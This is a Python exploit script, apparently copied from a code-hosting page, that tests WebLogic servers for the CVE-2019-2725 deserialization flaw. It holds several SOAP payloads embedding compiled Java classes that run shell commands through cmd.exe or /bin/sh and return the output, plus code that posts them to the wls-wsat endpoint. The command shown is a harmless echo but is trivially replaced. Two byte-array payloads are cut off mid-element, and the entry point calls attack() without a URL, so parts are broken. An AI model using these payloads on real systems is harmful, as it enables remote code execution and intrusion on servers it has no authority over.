186 lines
523 KiB
Python
186 lines
523 KiB
Python
|
# encoding=utf8
|
||
|
|
import requests
|
||
|
|
|
||
|
|
|
||
|
|
echo_cmd_payload_10271 = """<?xml version="1.0" encoding="utf-8"?>
|
||
|
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||
|
|
<soapenv:Header>
|
||
|
|
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
|
||
|
|
<java>
|
||
|
|
<void class="weblogic.utils.Hex" method="fromHexString" id="cls"><string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
|
||
|
|
</void>
|
||
|
|
<void class="org.mozilla.classfile.DefiningClassLoader">
|
||
|
|
<void method="defineClass">
|
||
|
|
<string>com.supeream.exploits.XmlExp</string>
|
||
|
|
<object idref="cls"></object>
|
||
|
|
<void method="newInstance">
|
||
|
|
<void method="say" id="proc">
|
||
|
|
<string>echo windowslu^fei linuxlu$1fei test</string>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
<void class="java.lang.Thread" method="currentThread">
|
||
|
|
<void method="getCurrentWork">
|
||
|
|
<void method="getResponse">
|
||
|
|
<void method="getServletOutputStream">
|
||
|
|
<void method="writeStream">
|
||
|
|
<object idref="proc"></object>
|
||
|
|
</void>
|
||
|
|
<void method="flush"/>
|
||
|
|
</void>
|
||
|
|
<void method="getWriter"><void method="write"><string></string></void></void>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
</java>
|
||
|
|
</work:WorkContext>
|
||
|
|
</soapenv:Header>
|
||
|
|
<soapenv:Body/>
|
||
|
|
</soapenv:Envelope>
|
||
|
|
"""
|
||
|
|
|
||
|
|
echo_cmd_payload_10_3_6 = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
|
||
|
|
<java><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>
|
||
|
|
<array class="byte" length="6857"><void index="0"> <byte>-84</byte></void><void index="1"> <byte>-19</byte></void><void index="3"> <byte>5</byte></void><void index="4"> <byte>115</byte></void><void index="5"> <byte>114</byte></void><void index="7"> <byte>23</byte></void><void index="8"> <byte>106</byte></void><void index="9"> <byte>97</byte></void><void index="10"> <byte>118</byte></void><void index="11"> <byte>97</byte></void><void index="12"> <byte>46</byte></void><void index="13"> <byte>117</byte></void><void index="14"> <byte>116</byte></void><void index="15"> <byte>105</byte></void><void index="16"> <byte>108</byte></void><void index="17"> <byte>46</byte></void><void index="18"> <byte>76</byte></void><void index="19"> <byte>105</byte></void><void index="20"> <byte>110</byte></void><void index="21"> <byte>107</byte></void><void index="22"> <byte>101</byte></void><void index="23"> <byte>100</byte></void><void index="24"> <byte>72</byte></void><void index="25"> <byte>97</byte></void><void index="26"> <byte>115</byte></void><void index="27"> <byte>104</byte></void><void index="28"> <byte>83</byte></void><void index="29"> <byte>101</byte></void><void index="30"> <byte>116</byte></void><void index="31"> <byte>-40</byte></void><void index="32"> <byte>108</byte></void><void index="33"> <byte>-41</byte></void><void index="34"> <byte>90</byte></void><void index="35"> <byte>-107</byte></void><void index="36"> <byte>-35</byte></void><void index="37"> <byte>42</byte></void><void index="38"> <byte>30</byte></void><void index="39"> <byte>2</byte></void><void index="42"> <byte>120</byte></void><void index="43"> <byte>114</byte></void><void index="45"> <byte>17</byte></void><void index="46"> <byte>106</byte></void><void index="47"> <byte>97</byte></void><void index="48"> <byte>118</byte></void><void index="49"> <byte>97</byte></void><void index="50"> <byte>46</byte></void><void index="51"> <byte>117</byte></void><void index="52"> <byte>116</byte></void><void index="53"> <byte>105</byte></void><void index="54"> <byte>108</byte></void><void index="55"> <byte>46</byte></void><void index="56"> <byte>72</byte></void><void index="57"> <byte>97</byte></void><void index="58"> <byte>115</byte></void><void index="59"> <byte>104</byte></void><void index="60"> <byte>83</byte></void><void index="61"> <byte>101</byte></void><void index="62"> <byte>116</byte></void><void index="63"> <byte>-70</byte></void><void index="64"> <byte>68</byte></void><void index="65"> <byte>-123</byte></void><void index="66"> <byte>-107</byte></void><void index="67"> <byte>-106</byte></void><void index="68"> <byte>-72</byte></void><void index="69"> <byte>-73</byte></void><void index="70"> <byte>52</byte></void><void index="71"> <byte>3</byte></void><void index="74"> <byte>120</byte></void><void index="75"> <byte>112</byte></void><void index="76"> <byte>119</byte></void><void index="77"> <byte>12</byte></void><void index="81"> <byte>16</byte></void><void index="82"> <byte>63</byte></void><void index="83"> <byte>64</byte></void><void index="89"> <byte>2</byte></void><void index="90"> <byte>115</byte></void><void index="91"> <byte>114</byte></void><void index="93"> <byte>58</byte></void><void index="94"> <byte>99</byte></void><void index="95"> <byte>111</byte></void><void index="96"> <byte>109</byte></void><void index="97"> <byte>46</byte></void><void index="98"> <byte>115</byte></void><void index="99"> <byte>117</byte></void><void index="100"> <byte>110</byte></void><void index="101"> <byte>46</byte></void><void index="102"> <byte>111</byte></void><void index="103"> <byte>114</byte></void><void index="104"> <byte>103</byte></void><void index="105"> <byte>46</byte></void><void index="106"> <byte>97</byte></void><void index="107"> <byte>112</byte></void><void index="108"> <byte>97</byte></void><void index="109"> <byte>99</byte></void><void index="110"> <byte>104</byte></void><void index="111"> <byte>101</byte></void><void index="112"> <byte>46</byte></void><void index="113"> <byte>120</byte></void><void index="114"> <byte>97</byte></void><void index="115"> <byte>108</byte
|
||
|
|
</void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
|
||
|
|
"""
|
||
|
|
|
||
|
|
echo_cmd_payload_10_3_6_2 = """<?xml version="1.0" encoding="utf-8"?>
|
||
|
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
|
||
|
|
<soapenv:Header>
|
||
|
|
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
|
||
|
|
<java>
|
||
|
|
<array method="forName">
|
||
|
|
<string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string>
|
||
|
|
<void>
|
||
|
|
<array class="byte" length="6862"><void index="0"><byte>-84</byte></void><void index="1"><byte>-19</byte></void><void index="3"><byte>5</byte></void><void index="4"><byte>115</byte></void><void index="5"><byte>114</byte></void><void index="7"><byte>23</byte></void><void index="8"><byte>106</byte></void><void index="9"><byte>97</byte></void><void index="10"><byte>118</byte></void><void index="11"><byte>97</byte></void><void index="12"><byte>46</byte></void><void index="13"><byte>117</byte></void><void index="14"><byte>116</byte></void><void index="15"><byte>105</byte></void><void index="16"><byte>108</byte></void><void index="17"><byte>46</byte></void><void index="18"><byte>76</byte></void><void index="19"><byte>105</byte></void><void index="20"><byte>110</byte></void><void index="21"><byte>107</byte></void><void index="22"><byte>101</byte></void><void index="23"><byte>100</byte></void><void index="24"><byte>72</byte></void><void index="25"><byte>97</byte></void><void index="26"><byte>115</byte></void><void index="27"><byte>104</byte></void><void index="28"><byte>83</byte></void><void index="29"><byte>101</byte></void><void index="30"><byte>116</byte></void><void index="31"><byte>-40</byte></void><void index="32"><byte>108</byte></void><void index="33"><byte>-41</byte></void><void index="34"><byte>90</byte></void><void index="35"><byte>-107</byte></void><void index="36"><byte>-35</byte></void><void index="37"><byte>42</byte></void><void index="38"><byte>30</byte></void><void index="39"><byte>2</byte></void><void index="42"><byte>120</byte></void><void index="43"><byte>114</byte></void><void index="45"><byte>17</byte></void><void index="46"><byte>106</byte></void><void index="47"><byte>97</byte></void><void index="48"><byte>118</byte></void><void index="49"><byte>97</byte></void><void index="50"><byte>46</byte></void><void index="51"><byte>117</byte></void><void index="52"><byte>116</byte></void><void index="53"><byte>105</byte></void><void index="54"><byte>108</byte></void><void index="55"><byte>46</byte></void><void index="56"><byte>72</byte></void><void index="57"><byte>97</byte></void><void index="58"><byte>115</byte></void><void index="59"><byte>104</byte></void><void index="60"><byte>83</byte></void><void index="61"><byte>101</byte></void><void index="62"><byte>116</byte></void><void index="63"><byte>-70</byte></void><void index="64"><byte>68</byte></void><void index="65"><byte>-123</byte></void><void index="66"><byte>-107</byte></void><void index="67"><byte>-106</byte></void><void index="68"><byte>-72</byte></void><void index="69"><byte>-73</byte></void><void index="70"><byte>52</byte></void><void index="71"><byte>3</byte></void><void index="74"><byte>120</byte></void><void index="75"><byte>112</byte></void><void index="76"><byte>119</byte></void><void index="77"><byte>12</byte></void><void index="81"><byte>16</byte></void><void index="82"><byte>63</byte></void><void index="83"><byte>64</byte></void><void index="89"><byte>2</byte></void><void index="90"><byte>115</byte></void><void index="91"><byte>114</byte></void><void index="93"><byte>58</byte></void><void index="94"><byte>99</byte></void><void index="95"><byte>111</byte></void><void index="96"><byte>109</byte></void><void index="97"><byte>46</byte></void><void index="98"><byte>115</byte></void><void index="99"><byte>117</byte></void><void index="100"><byte>110</byte></void><void index="101"><byte>46</byte></void><void index="102"><byte>111</byte></void><void index="103"><byte>114</byte></void><void index="104"><byte>103</byte></void><void index="105"><byte>46</byte></void><void index="106"><byte>97</byte></void><void index="107"><byte>112</byte></void><void index="108"><byte>97</byte></void><void index="109"><byte>99</byte></void><void index="110"><byte>104</byte></void><void index="111"><byte>101</byte></void><void index="112"><byte>46</byte></void><void index="113"><byte>120</byte></void><void index="114"><byte>97</byte></void><void index="115"><byte>108</byte></void><void index="116"><byte>97</byte></void><void index="117"><byte>110</byte></void><void index
|
||
|
|
</void>
|
||
|
|
</array>
|
||
|
|
</java>
|
||
|
|
</work:WorkContext>
|
||
|
|
</soapenv:Header>
|
||
|
|
<soapenv:Body/>
|
||
|
|
</soapenv:Envelope>"""
|
||
|
|
|
||
|
|
echo_cmd_payload_12_1_3 = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
|
||
|
|
<java>
|
||
|
|
<class><string>org.slf4j.ext.EventData</string>
|
||
|
|
<void>
|
||
|
|
<string>
|
||
|
|
<java>
|
||
|
|
<void class="sun.misc.BASE64Decoder">
|
||
|
|
<void method="decodeBuffer" id="byte_arr"> <string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
<void class="org.mozilla.classfile.DefiningClassLoader">
|
||
|
|
<void method="defineClass">
|
||
|
|
<string>ResultBaseExec</string>
|
||
|
|
<object idref="byte_arr"></object>
|
||
|
|
<void method="newInstance">
|
||
|
|
<void method="do_exec" id="result">
|
||
|
|
<string>echo windowslu^fei linuxlu$1fei test</string>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
|
||
|
|
<void class="java.lang.Thread" method="currentThread">
|
||
|
|
<void method="getCurrentWork" id="current_work">
|
||
|
|
<void method="getClass">
|
||
|
|
<void method="getDeclaredField">
|
||
|
|
<string>connectionHandler</string>
|
||
|
|
<void method="setAccessible"><boolean>true</boolean></void>
|
||
|
|
<void method="get">
|
||
|
|
<object idref="current_work"></object>
|
||
|
|
<void method="getServletRequest">
|
||
|
|
<void method="getResponse">
|
||
|
|
<void method="getServletOutputStream">
|
||
|
|
<void method="writeStream">
|
||
|
|
<object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object>
|
||
|
|
</void>
|
||
|
|
<void method="flush"/>
|
||
|
|
</void>
|
||
|
|
<void method="getWriter"><void method="write"><string></string></void></void>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
</void>
|
||
|
|
</java>
|
||
|
|
</string>
|
||
|
|
</void>
|
||
|
|
</class>
|
||
|
|
</java>
|
||
|
|
</work:WorkContext>
|
||
|
|
</soapenv:Header>
|
||
|
|
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
|
||
|
|
"""
|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
def attack(url):
|
||
|
|
print('[+]开始检测-Weblogic-CVE-2019-2725。[+]')
|
||
|
|
vul_url = url + '/wls-wsat/CoordinatorPortType11'
|
||
|
|
headers = {
|
||
|
|
'Content-Type':'text/xml',
|
||
|
|
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0',
|
||
|
|
'SOAPAction':'',
|
||
|
|
'lfcmd':'echo windowslu^fei linuxlu$1fei test'
|
||
|
|
}
|
||
|
|
|
||
|
|
# weblogic-10271 命令回显
|
||
|
|
# rsp = requests.post(vul_url, data=echo_cmd_payload_10271, verify=False, headers=headers)
|
||
|
|
# if "windowslufei" in rsp.text:
|
||
|
|
# print("[*]存在漏洞 echo_cmd_payload_10271,在windows")
|
||
|
|
# exit()
|
||
|
|
# elif "linuxlufei" in rsp.text:
|
||
|
|
# print("[*]存在漏洞 echo_cmd_payload_10271,在linux")
|
||
|
|
# exit()
|
||
|
|
|
||
|
|
# jdk7u21 命令回显
|
||
|
|
try:
|
||
|
|
rsp = requests.post(vul_url, data=echo_cmd_payload_10_3_6, verify=False, headers=headers)
|
||
|
|
if "windowslufei" in rsp.text:
|
||
|
|
print("[*]存在漏洞 echo_cmd_payload_10_0_3,在windows")
|
||
|
|
elif "linuxlufei" in rsp.text:
|
||
|
|
print("[*]存在漏洞 echo_cmd_payload_10_0_3,在linux")
|
||
|
|
else:
|
||
|
|
print("[-]不存在漏洞 echo_cmd_payload_10_3_6,在windows/linux")
|
||
|
|
except:
|
||
|
|
print("[-]不存在漏洞 echo_cmd_payload_10_0_3,在windows/linux")
|
||
|
|
|
||
|
|
try:
|
||
|
|
rsp = requests.post(vul_url, data=echo_cmd_payload_10_3_6_2, verify=False, headers=headers)
|
||
|
|
if "windowslufei" in rsp.text:
|
||
|
|
print("[*]存在漏洞 echo_cmd_payload_10_3_6.2,在windows")
|
||
|
|
elif "linuxlufei" in rsp.text:
|
||
|
|
print("[*]存在漏洞 echo_cmd_payload_10_3_6.2,在linux")
|
||
|
|
else:
|
||
|
|
print("[-]不存在漏洞 echo_cmd_payload_10_3_6.2,在windows/linux")
|
||
|
|
except:
|
||
|
|
print("[-]不存在漏洞 echo_cmd_payload_10_3_6.2,在windows/linux")
|
||
|
|
|
||
|
|
# EventData
|
||
|
|
try:
|
||
|
|
rsp = requests.post(vul_url, data=echo_cmd_payload_12_1_3, verify=False, headers=headers)
|
||
|
|
if "windowslufei" in rsp.text:
|
||
|
|
print("[*]存在漏洞 echo_cmd_payload_12_1_3,在windows")
|
||
|
|
exit()
|
||
|
|
elif "linuxlufei" in rsp.text:
|
||
|
|
print("[*]存在漏洞 echo_cmd_payload_12_1_3,在linux")
|
||
|
|
exit()
|
||
|
|
else:
|
||
|
|
print("[-]不存在漏洞 echo_cmd_payload_12_1_3,在windows/linux")
|
||
|
|
except:
|
||
|
|
print("[-]不存在漏洞 echo_cmd_payload_12_1_3,在windows/linux")
|
||
|
|
|
||
|
|
print('[+]检测结束-Weblogic-CVE-2019-2725。[+]')
|
||
|
|
print('\n')
|
||
|
|
|
||
|
|
|
||
|
|
if __name__ == '__main__':
|
||
|
|
attack()
|